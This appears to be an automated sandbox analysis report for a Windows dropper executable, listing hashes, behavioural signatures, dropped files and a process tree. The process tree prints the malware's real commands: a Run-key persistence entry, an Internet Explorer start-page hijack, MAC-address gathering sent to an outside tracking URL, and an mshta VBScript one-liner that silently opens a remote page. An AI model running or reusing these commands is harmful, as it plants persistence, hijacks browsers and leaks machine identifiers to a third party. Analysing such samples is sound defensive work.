Analysis

  • max time kernel
    153s
  • max time network
    139s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20231215-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    07/01/2024, 19:15

General

  • Target

    ac9268cb2641b313f7460ce40169e59b.exe

  • Size

    5KB

  • MD5

    ac9268cb2641b313f7460ce40169e59b

  • SHA1

    e32b781c7d15cd0e1354edd4e488e2750706e278

  • SHA256

    d3aceee88f292e6bc52b4fe8eb9de669fe612e62ed4717ef05aaaf6eea29c569

  • SHA512

    7b31c764279a959830c02a65fad81a1bcbfb8e41a6c00dcc8d68a0d6b925d782c73b8474f3e9ed1ec6e31801400886136dca459956e9201c45e83ad14c41d41f

  • SSDEEP

    96:vfycZ+ALBd3vJEtPsCZIB2oPRGHzb7v1JydcRxN:ny2tLHR4sCOD8HD117N

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://chaliang.115ku.cn/1261/yahooo.htm%22,0%29%28window.close%29

Signatures

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Drops file in Windows directory 11 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Modifies Internet Explorer settings 1 TTPs 60 IoCs
  • Modifies Internet Explorer start page 1 TTPs 1 IoCs
  • Modifies registry class 2 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs .reg file with regedit 2 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 45 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ac9268cb2641b313f7460ce40169e59b.exe
    "C:\Users\Admin\AppData\Local\Temp\ac9268cb2641b313f7460ce40169e59b.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4020
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\240632750.bat
      2⤵
      • Checks computer location settings
      • Drops file in Windows directory
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:4364
      • C:\Windows\SysWOW64\reg.exe
        reg add hklm\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v pop /t REG_SZ /d C:\Windows\Registration\runauto.vbs /f
        3⤵
        • Adds Run key to start application
        • Modifies registry key
        PID:960
      • C:\Windows\SysWOW64\regedit.exe
        Regedit /s tem.reg
        3⤵
        • Modifies registry class
        • Runs .reg file with regedit
        PID:4876
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t reg_sz /d http://www.115ku.com/?1261/ /f
        3⤵
        • Modifies Internet Explorer settings
        • Modifies Internet Explorer start page
        PID:1848
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v HOMEPAGE /t REG_DWORD /d 00000001 /f
        3⤵
          PID:1384
        • C:\Windows\SysWOW64\regedit.exe
          Regedit /s gai.reg
          3⤵
          • Runs .reg file with regedit
          PID:2424
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ipconfig /all|findstr /c:"Physical Address"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4332
          • C:\Windows\SysWOW64\ipconfig.exe
            ipconfig /all
            4⤵
            • Gathers network information
            PID:1800
          • C:\Windows\SysWOW64\findstr.exe
            findstr /c:"Physical Address"
            4⤵
              PID:4916
          • C:\Windows\SysWOW64\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Windows\Registration\r.vbs"
            3⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:4220
            • C:\Program Files\Internet Explorer\iexplore.exe
              "C:\Program Files\Internet Explorer\iexplore.exe" http://chaliang.115ku.cn/1261/count.asp?mac= FA:D2:FA:C7:20:2F&os=Windows_NT&ver=12610523
              4⤵
              • Modifies Internet Explorer settings
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:1396
              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1396 CREDAT:17410 /prefetch:2
                5⤵
                • Modifies Internet Explorer settings
                • Suspicious use of SetWindowsHookEx
                PID:1544
            • C:\Program Files\Internet Explorer\iexplore.exe
              "C:\Program Files\Internet Explorer\iexplore.exe" http://chaliang.115ku.cn/zongtai/count.asp?mac= FA:D2:FA:C7:20:2F&os=Windows_NT&ver=12610523
              4⤵
              • Modifies Internet Explorer settings
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:4372
              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4372 CREDAT:17410 /prefetch:2
                5⤵
                • Modifies Internet Explorer settings
                • Suspicious use of SetWindowsHookEx
                PID:3948
          • C:\Windows\SysWOW64\mshta.exe
            mshta vbscript:CreateObject("WScript.Shell").Run("iexplore http://chaliang.115ku.cn/1261/yahooo.htm",0)(window.close)
            3⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:2404
            • C:\Program Files\Internet Explorer\iexplore.exe
              "C:\Program Files\Internet Explorer\iexplore.exe" http://chaliang.115ku.cn/1261/yahooo.htm
              4⤵
              • Modifies Internet Explorer settings
              PID:2060

      Network

      MITRE ATT&CK Enterprise v15

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{2BFE1D05-AD91-11EE-B6AD-FAD2FAC7202F}.dat

        Filesize

        5KB

        MD5

        3943df2bacc9c7718998d96409fa2bc8

        SHA1

        4e016d13f9f640aec8737a16271db84f4caf57c7

        SHA256

        50fad6eafb4060c91f395ca734231a64c7923d5add86fc3f2728cdd5d1143d19

        SHA512

        0a80838ce4905291b06ba7687af88071b500193f7301dfdcaf6f156a90134da55cccbc02b193389f9a6739f4ac8fe064b2836e381b04a4d4170825048412a386

      • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{2C02E041-AD91-11EE-B6AD-FAD2FAC7202F}.dat

        Filesize

        3KB

        MD5

        96fffcbe39504886fa26e018e9fb1650

        SHA1

        55455dfd549cbd34da6e61b0eca91b925d10bdcd

        SHA256

        f6b9b735d1055221844357650a178d2d5b6508f21d9945eedc2636ff478c073b

        SHA512

        9fd3e2ba4420a08c36912912e20927d88abae4a6f8cfa52004644b4a604e0c075c0f8fd51bfb44c0c0b981e8b6bb129537b29ed690d2fcee4f26663bcffab972

      • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\VersionManager\ver679E.tmp

        Filesize

        15KB

        MD5

        1a545d0052b581fbb2ab4c52133846bc

        SHA1

        62f3266a9b9925cd6d98658b92adec673cbe3dd3

        SHA256

        557472aeaebf4c1c800b9df14c190f66d62cbabb011300dbedde2dcddd27a6c1

        SHA512

        bd326d111589d87cd6d019378ec725ac9ac7ad4c36f22453941f7d52f90b747ede4783a83dfff6cae1b3bb46690ad49cffa77f2afda019b22863ac485b406e8d

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\M8F18HYR\suggestions[1].en-US

        Filesize

        17KB

        MD5

        5a34cb996293fde2cb7a4ac89587393a

        SHA1

        3c96c993500690d1a77873cd62bc639b3a10653f

        SHA256

        c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad

        SHA512

        e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

      • C:\Users\Admin\AppData\Local\Temp\240632750.bat

        Filesize

        9KB

        MD5

        52b3b486737185cd4c4eff05e3e1f864

        SHA1

        de4bda3507cc183cf72c97e5cc1ffc6332467268

        SHA256

        294f357ba1e2c985df765cb065b6386ea41398442766c34f76f18d2a149d4ae1

        SHA512

        757b8816b18374af07d597a2f58e415fcfa49eceea6cc69ec66b880d241975b9cd42be92cb39cea09f2aa1bfacec41dcb4438b122955c66166c544ad71b3774f

      • C:\Users\Admin\AppData\Local\Temp\gai.reg

        Filesize

        309B

        MD5

        8c9d7b6c427f4978944db6dcdf2905be

        SHA1

        8fb3eb9e98895a774fdd4f043205a2d7abf75ccd

        SHA256

        b70851b5596fc38203915b7803d6e6b96e2bfc4a99f7181418dc489bf4b290de

        SHA512

        8cfaa804ad8e58c8394d19d9a28b07e81c4ac52d2aaabb1eb1b16a97b6d52a4cda204f0d23557e83f9a1bfd906dec42d9cd8a88433cedd69e833ee9767508897

      • C:\Users\Admin\AppData\Local\Temp\tem.reg

        Filesize

        222B

        MD5

        6a93b828dc3fcb54b2e3919c0b3baadd

        SHA1

        63894f7f0b727cae32e583909e78928250704f74

        SHA256

        ebe5d10b0794a2374bb21f8508649abecc8c6036f49c36d504123feb3eb01764

        SHA512

        8bbf0aeb1c90df3badeae7298fadf77aceb1edf1d723e4c8e304ee0de635740a8b2807c98b277664ad8a2e1a44ae3a26c1fe793909a74191bb48d58ad81db0dd

      • C:\Users\Admin\Favorites\115酷上网导航 上网就上115酷上网导航.url

        Filesize

        132B

        MD5

        678552ee826a12311aa214128cc429d9

        SHA1

        f25d1d39cf165549be0d282c562f1e8820f4ad7a

        SHA256

        8f52283b091ae14d72cb8cfeb21f5ebfb682f534d0b63472e04015c3daf25543

        SHA512

        8cf3556e94fdbba84dbbc98045f5a5614ada95970bfe255ab6a8e1573f9c333148b119b2a7276aafeae975a5958a6fe716213d96e48d57588bbfb673a7317bcb

      • C:\Windows\Registration\r.vbs

        Filesize

        281B

        MD5

        f5e6165cade8182794e0f0f026905e1d

        SHA1

        961f1210ac90d4e08eed577877759ea0e4f1b405

        SHA256

        3b00a0ae7969fdc75a43a9fa05d21f45643e4236ae963812857f820373755368

        SHA512

        fa11ed584ccfd08a102856942c86679512ec5b94feb6337f4c53b8f62532179674fc9e4df1a4eebc40dca64e960c46e8f3467489d7d74f583652a4063910b0b2

      • memory/4020-0-0x0000000000400000-0x0000000000408000-memory.dmp

        Filesize

        32KB

      • memory/4020-92-0x0000000000400000-0x0000000000408000-memory.dmp

        Filesize

        32KB